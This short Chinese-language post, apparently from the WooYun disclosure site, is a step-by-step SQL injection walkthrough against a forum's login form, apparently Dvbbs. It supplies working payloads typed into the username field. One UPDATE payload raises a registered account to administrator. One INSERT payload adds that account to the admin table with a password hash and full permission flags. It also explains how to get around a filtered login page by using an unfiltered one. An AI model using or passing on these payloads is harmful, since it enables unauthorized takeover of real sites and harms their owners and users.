WooYun.org

先在网站注册一个帐号 再退出到登录界面:用户名输入
';update dv_user set usergroupid=1 where username='elao'-- "elao" 为刚申请的帐号
密码填 刚才的密码,登录

他会提示密码错误.
这个页面不是系统自带的貌似做了过滤,所以重新找登录界面.随便点一个没有权限浏览的贴子,他会教你输入帐号,在这个地方就可以提权.

用户名输入
';update dv_user set usergroupid=1 where username='elao'-- "elao" 为刚申请的帐号
密码填 刚才的密码,登录
这是再使用注册的帐号和密码登录进去权限就是管理员的权限

下来就是和后台关联了,
先退出找到刚才的登录页面.
用户名输入 elao';insert into dv_admin (username,password,flag,adduser) values ('elao','49ba59abbe56e057','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45','elao')-- （elao 为刚才注册的帐号, 中间的MD5加密的 ,替换为 自己刚才用的密码加密后的MD5）
密码输入刚才的密码 登录后也是会提示错误。

然后使用自己注册的帐号和密码登录 就是后台管理员了。